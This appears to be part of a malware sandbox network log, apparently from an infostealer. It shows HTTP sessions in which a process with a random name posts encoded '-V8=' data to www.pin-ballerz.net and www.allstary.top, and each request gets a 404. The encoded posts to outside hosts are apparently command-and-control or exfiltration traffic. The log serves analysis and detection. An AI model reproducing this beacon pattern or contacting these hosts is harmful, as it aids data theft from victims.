                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Raw: 2d 56 38 3d 43 75 79 45 55 33 55 49 35 53 77 2b 64 45 63 68 6b 6d 6e 33 64 71 30 76 35 51 4f 56 70 39 4b 31 64 67 65 4d 66 43 78 35 61 52 52 58 78 59 6c 55 50 66 4f 55 58 39 52 71 64 46 77 30 48 2f 50 66 47 41 62 6d 4a 59 65 59 76 79 6e 78 63 45 77 79 79 34 6a 7a 50 79 45 67 79 57 34 69 33 6e 4d 35 74 6b 65 79 50 36 6d 70 61 47 32 52 6d 69 57 4c 76 46 59 65 58 59 5a 4b 58 61 5a 41 6a 56 4c 33 35 35 57 43 30 76 74 52 4e 49 4b 65 38 6a 64 61 2f 6b 4f 74 71 4d 75 7a 69 4d 4e 55 76 4c 41 50 55 64 74 31 67 72 6f 4b 75 6e 76 79 52 52 74 46 30 72 52 77 72 73 34 36 62 74 75 46 67 75 63 54 6f 58 41 31 4d 75 77 3d
                                                Data Ascii: -V8=CuyEU3UI5Sw+dEchkmn3dq0v5QOVp9K1dgeMfCx5aRRXxYlUPfOUX9RqdFw0H/PfGAbmJYeYvynxcEwyy4jzPyEgyW4i3nM5tkeyP6mpaG2RmiWLvFYeXYZKXaZAjVL355WC0vtRNIKe8jda/kOtqMuziMNUvLAPUdt1groKunvyRRtF0rRwrs46btuFgucToXA1Muw=
                                                Dec 17, 2024 03:41:26.808120012 CET479INHTTP/1.1 404 Not Found
                                                Date: Tue, 17 Dec 2024 02:41:26 GMT
                                                Server: Apache
                                                Content-Length: 315
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.549851199.15.251.162804444C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 17, 2024 03:41:28.342521906 CET669OUTPOST /ocjg/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 224
                                                Connection: close
                                                Cache-Control: max-age=0
                                                Host: www.pin-ballerz.net
                                                Origin: http://www.pin-ballerz.net
                                                Referer: http://www.pin-ballerz.net/ocjg/
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Raw: 2d 56 38 3d 43 75 79 45 55 33 55 49 35 53 77 2b 66 67 67 68 69 46 50 33 4d 36 30 73 6c 41 4f 56 67 64 4c 38 64 67 61 4d 66 44 31 70 61 6b 35 58 77 37 78 55 4f 65 4f 55 61 64 52 71 56 6c 77 31 4b 66 50 51 47 42 6d 62 4a 5a 69 59 76 79 7a 78 63 45 67 79 79 4c 4c 73 4f 69 46 47 36 32 34 6b 70 58 4d 35 74 6b 65 79 50 37 43 50 61 47 75 52 6d 53 47 4c 70 58 77 52 55 59 5a 4a 51 61 5a 41 6e 56 4c 37 35 35 58 6c 30 75 68 33 4e 4b 69 65 38 6e 5a 61 2b 31 50 66 68 4d 76 34 6d 4d 4e 47 6d 37 55 44 54 72 6b 39 76 36 68 63 39 77 4b 48 5a 48 63 76 75 4a 5a 59 34 4d 55 43 4c 2b 6d 79 78 65 39 36 79 30 51 46 53 35 6d 42 6c 48 30 38 48 6d 32 41 4c 63 56 62 41 6a 50 2b 6c 39 49 68
                                                Data Ascii: -V8=CuyEU3UI5Sw+fgghiFP3M60slAOVgdL8dgaMfD1pak5Xw7xUOeOUadRqVlw1KfPQGBmbJZiYvyzxcEgyyLLsOiFG624kpXM5tkeyP7CPaGuRmSGLpXwRUYZJQaZAnVL755Xl0uh3NKie8nZa+1PfhMv4mMNGm7UDTrk9v6hc9wKHZHcvuJZY4MUCL+myxe96y0QFS5mBlH08Hm2ALcVbAjP+l9Ih
                                                Dec 17, 2024 03:41:29.469501019 CET479INHTTP/1.1 404 Not Found
                                                Date: Tue, 17 Dec 2024 02:41:29 GMT
                                                Server: Apache
                                                Content-Length: 315
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.549857199.15.251.162804444C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 17, 2024 03:41:30.996507883 CET1686OUTPOST /ocjg/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 1240
                                                Connection: close
                                                Cache-Control: max-age=0
                                                Host: www.pin-ballerz.net
                                                Origin: http://www.pin-ballerz.net
                                                Referer: http://www.pin-ballerz.net/ocjg/
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Raw: 2d 56 38 3d 43 75 79 45 55 33 55 49 35 53 77 2b 66 67 67 68 69 46 50 33 4d 36 30 73 6c 41 4f 56 67 64 4c 38 64 67 61 4d 66 44 31 70 61 69 68 58 77 4c 74 55 50 39 32 55 62 64 52 71 62 46 77 4f 4b 66 50 33 47 41 4f 58 4a 5a 75 79 76 30 33 78 64 6e 34 79 36 61 4c 73 62 79 46 47 34 32 34 68 33 6e 4d 73 74 6b 50 37 50 36 79 50 61 47 75 52 6d 55 69 4c 34 46 59 52 62 34 5a 4b 58 61 5a 45 6a 56 4c 66 35 35 50 66 30 75 6c 42 4e 36 43 65 38 48 4a 61 38 48 58 66 73 4d 76 36 71 73 4d 56 6d 37 4a 64 54 71 4e 45 76 36 56 6c 39 32 36 48 5a 47 39 37 36 4c 78 44 6b 76 73 63 48 70 79 44 67 4c 52 6b 38 6b 59 43 64 72 75 46 68 6b 73 35 4f 68 79 35 4e 2f 34 43 65 6d 7a 35 31 5a 5a 62 77 39 66 67 45 78 32 34 49 76 54 74 4d 4e 42 66 46 39 71 4f 4b 45 52 45 6c 57 69 4f 36 6c 49 43 75 6d 78 74 46 56 61 7a 46 79 63 46 56 32 55 36 6c 49 71 71 30 67 32 56 36 4d 6e 38 2f 76 6d 67 70 36 75 5a 66 70 64 32 58 67 62 39 6e 63 62 38 78 77 69 46 41 49 6f 69 51 70 36 67 58 70 6b 7a 6c 7a 75 46 57 64 49 30 67 49 44 72 32 6b 6b 32 69 58 [TRUNCATED]
                                                Data Ascii: -V8=CuyEU3UI5Sw+fgghiFP3M60slAOVgdL8dgaMfD1paihXwLtUP92UbdRqbFwOKfP3GAOXJZuyv03xdn4y6aLsbyFG424h3nMstkP7P6yPaGuRmUiL4FYRb4ZKXaZEjVLf55Pf0ulBN6Ce8HJa8HXfsMv6qsMVm7JdTqNEv6Vl926HZG976LxDkvscHpyDgLRk8kYCdruFhks5Ohy5N/4Cemz51ZZbw9fgEx24IvTtMNBfF9qOKERElWiO6lICumxtFVazFycFV2U6lIqq0g2V6Mn8/vmgp6uZfpd2Xgb9ncb8xwiFAIoiQp6gXpkzlzuFWdI0gIDr2kk2iXcwE8LfF4AlrfbJ5CSuACH/Ts6yig9PSgOm6RZH7oDZc9GCZ9Cv+b9pe3imlbBKguSbIX0D83gL2sUc5IKNUG1rcJiqUB29WD9HGzJVqRmqsvpG0AH2sZOuWvGYZY/bWxrFwfd57xiSRx+GmONF+TuIRs1TjkKC7juwaahR7ijGNLxpXxQS1yByzjickMmC18nVOd5iHzXyJvQbp02pijinY0fai4WO9K9PyAG5R01kWS0YHvZrzKY6AumMlIjkkuVcwZuLVF1zldDvRCdYCSMASxqbJIA4hw8X57Il8N6fi/BOwl5ZmKbI/zag0BRllt5DXXTBmpX74J5xBpALf+foOPR+AFiFYjvzWSt6l5Ric1oNvPGxMKuq9wdH5z72ynZ23IxN2r0ZmZFTe/+x0+Ow6bXRleS1kJbNtt8SbzPNebvp8TFPIHmjV+LtR54G2c35WMxANuIKFDbGMIzYqjKoPQlQMU4laiA/fSGnpO1MpHtD5WMgdQ7Ds6qnVE0K1NUU/Je8+d67q7eB7KyUiPZp7mOznjSFs5M8J1IsBsAGTSkn6DlDSE6Aj1bIJ1mE0WZrLsxt5Q26aTpTYNGQBlMPdhVJJsJLv4SsV7UiWXEMoKjUoECTbOJN6EhHWBWiryMhpY5m9lPd8tmeVNrQTvEBNkbUSi98M00J [TRUNCATED]
                                                Dec 17, 2024 03:41:32.091340065 CET479INHTTP/1.1 404 Not Found
                                                Date: Tue, 17 Dec 2024 02:41:31 GMT
                                                Server: Apache
                                                Content-Length: 315
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.549863199.15.251.162804444C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 17, 2024 03:41:33.653446913 CET388OUTGET /ocjg/?-V8=PsakXBZzgyoVbyp2hjDhUIAPjymto9iGXnTsMAFbSxg7wqJ/GaGLf9R1SWA0D+LwAwOTNpeqtTSBVw9+2LbbbxVu9AMo8WkIslXiFZquUVbpmyTV+kMBZINqQZENrlqOtg==&2H=b6QHb8C0WpQhtV HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Connection: close
                                                Host: www.pin-ballerz.net
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Dec 17, 2024 03:41:34.752705097 CET479INHTTP/1.1 404 Not Found
                                                Date: Tue, 17 Dec 2024 02:41:34 GMT
                                                Server: Apache
                                                Content-Length: 315
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                9192.168.2.549879199.193.6.134804444C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 17, 2024 03:41:41.013180017 CET640OUTPOST /83oq/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 204
                                                Connection: close
                                                Cache-Control: max-age=0
                                                Host: www.allstary.top
                                                Origin: http://www.allstary.top
                                                Referer: http://www.allstary.top/83oq/
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Raw: 2d 56 38 3d 6a 4d 6c 62 56 41 54 78 68 48 57 4d 4d 62 47 44 64 63 52 31 58 4b 4b 6d 44 38 42 45 6d 6a 67 2f 64 38 5a 70 59 45 55 2f 42 61 71 6d 41 47 78 58 33 38 62 74 2f 32 33 52 41 77 58 36 41 35 33 49 61 6a 79 39 68 34 64 6e 48 48 62 33 77 31 38 6b 66 4b 39 61 56 4e 45 45 4e 46 67 76 53 33 74 4a 45 47 50 48 49 4b 4f 72 52 67 72 42 41 4a 58 4a 52 4e 71 78 54 79 53 76 30 70 52 49 34 6f 67 4c 78 5a 51 6c 55 2b 42 58 4e 53 30 75 6f 6f 61 6e 59 51 71 57 36 79 38 72 6c 35 57 64 79 33 31 4e 4d 70 73 70 37 55 4f 67 32 51 69 6d 6a 65 39 6c 69 33 47 67 70 76 66 54 2b 30 37 76 73 6c 34 62 35 64 62 30 76 2f 55 3d
                                                Data Ascii: -V8=jMlbVATxhHWMMbGDdcR1XKKmD8BEmjg/d8ZpYEU/BaqmAGxX38bt/23RAwX6A53Iajy9h4dnHHb3w18kfK9aVNEENFgvS3tJEGPHIKOrRgrBAJXJRNqxTySv0pRI4ogLxZQlU+BXNS0uooanYQqW6y8rl5Wdy31NMpsp7UOg2Qimje9li3GgpvfT+07vsl4b5db0v/U=
                                                Dec 17, 2024 03:41:42.257824898 CET533INHTTP/1.1 404 Not Found
                                                Date: Tue, 17 Dec 2024 02:41:42 GMT
                                                Server: Apache
                                                Content-Length: 389
                                                Connection: close
                                                Content-Type: text/html
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                10192.168.2.549886199.193.6.134804444C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 17, 2024 03:41:43.677175999 CET660OUTPOST /83oq/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 224
                                                Connection: close
                                                Cache-Control: max-age=0
                                                Host: www.allstary.top
                                                Origin: http://www.allstary.top
                                                Referer: http://www.allstary.top/83oq/
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Raw: 2d 56 38 3d 6a 4d 6c 62 56 41 54 78 68 48 57 4d 4f 37 32 44 63 2f 35 31 66 4b 4b 6c 50 63 42 45 7a 7a 68 32 64 38 56 70 59 47 35 36 42 6f 2b 6d 42 6e 42 58 30 2b 6a 74 2b 32 33 52 4c 51 58 6a 45 35 33 54 61 6a 75 44 68 37 46 6e 48 44 37 33 77 33 6b 6b 63 39 68 56 58 64 45 47 46 6c 67 74 50 48 74 4a 45 47 50 48 49 4c 71 4e 52 6b 48 42 41 59 6e 4a 54 6f 4b 32 61 53 54 64 39 4a 52 49 76 59 67 31 78 5a 52 32 55 2f 64 78 4e 51 4d 75 6f 72 4f 6e 57 68 71 56 78 79 38 74 39 5a 58 64 69 44 35 43 4c 4c 6b 47 36 57 4b 6d 76 52 71 41 72 49 4d 50 34 56 4f 49 36 50 7a 72 75 6e 7a 59 39 56 5a 79 6a 2b 4c 45 78 6f 41 47 49 4c 32 46 6a 6c 43 4f 69 6f 52 34 4f 32 2b 45 33 57 42 46
                                                Data Ascii: -V8=jMlbVATxhHWMO72Dc/51fKKlPcBEzzh2d8VpYG56Bo+mBnBX0+jt+23RLQXjE53TajuDh7FnHD73w3kkc9hVXdEGFlgtPHtJEGPHILqNRkHBAYnJToK2aSTd9JRIvYg1xZR2U/dxNQMuorOnWhqVxy8t9ZXdiD5CLLkG6WKmvRqArIMP4VOI6PzrunzY9VZyj+LExoAGIL2FjlCOioR4O2+E3WBF
                                                Dec 17, 2024 03:41:44.910455942 CET533INHTTP/1.1 404 Not Found
                                                Date: Tue, 17 Dec 2024 02:41:44 GMT
                                                Server: Apache
                                                Content-Length: 389
                                                Connection: close
                                                Content-Type: text/html
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                11192.168.2.549892199.193.6.134804444C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 17, 2024 03:41:46.353830099 CET1677OUTPOST /83oq/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 1240
                                                Connection: close
                                                Cache-Control: max-age=0
                                                Host: www.allstary.top
                                                Origin: http://www.allstary.top
                                                Referer: http://www.allstary.top/83oq/
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Raw: 2d 56 38 3d 6a 4d 6c 62 56 41 54 78 68 48 57 4d 4f 37 32 44 63 2f 35 31 66 4b 4b 6c 50 63 42 45 7a 7a 68 32 64 38 56 70 59 47 35 36 42 6f 6d 6d 41 52 39 58 30 5a 50 74 39 32 33 52 47 77 58 6d 45 35 32 4a 61 6a 6d 66 68 37 4a 33 48 46 33 33 77 53 34 6b 5a 49 56 56 64 64 45 47 48 6c 67 73 53 33 74 6d 45 47 66 39 49 4b 61 4e 52 6b 48 42 41 62 2f 4a 58 39 71 32 59 53 53 76 30 70 52 45 34 6f 67 4f 78 5a 49 44 55 2f 5a 48 4f 68 73 75 6f 4e 75 6e 61 7a 53 56 75 43 38 76 6f 5a 58 7a 69 45 77 43 4c 50 38 67 36 58 2f 78 76 57 75 41 68 4a 68 7a 71 33 61 4f 69 75 54 33 6f 55 7a 66 6b 6c 6f 52 72 34 33 6f 38 34 68 68 55 5a 69 34 70 53 4f 66 33 6f 5a 6f 53 44 2b 50 37 53 6f 64 56 7a 41 55 39 69 55 6e 51 71 56 56 58 4d 77 52 35 55 37 50 63 69 52 36 46 69 45 56 5a 5a 31 33 6e 45 41 34 67 79 76 58 72 51 32 74 64 46 73 44 74 76 53 64 32 66 59 44 49 46 74 62 6d 79 58 73 54 71 62 7a 75 57 59 38 35 50 61 4c 55 30 70 69 54 79 69 57 69 52 2f 79 65 45 2f 61 55 30 45 52 6a 4c 43 6c 5a 73 4a 35 59 6b 77 4f 42 4c 5a 39 6f 44 [TRUNCATED]
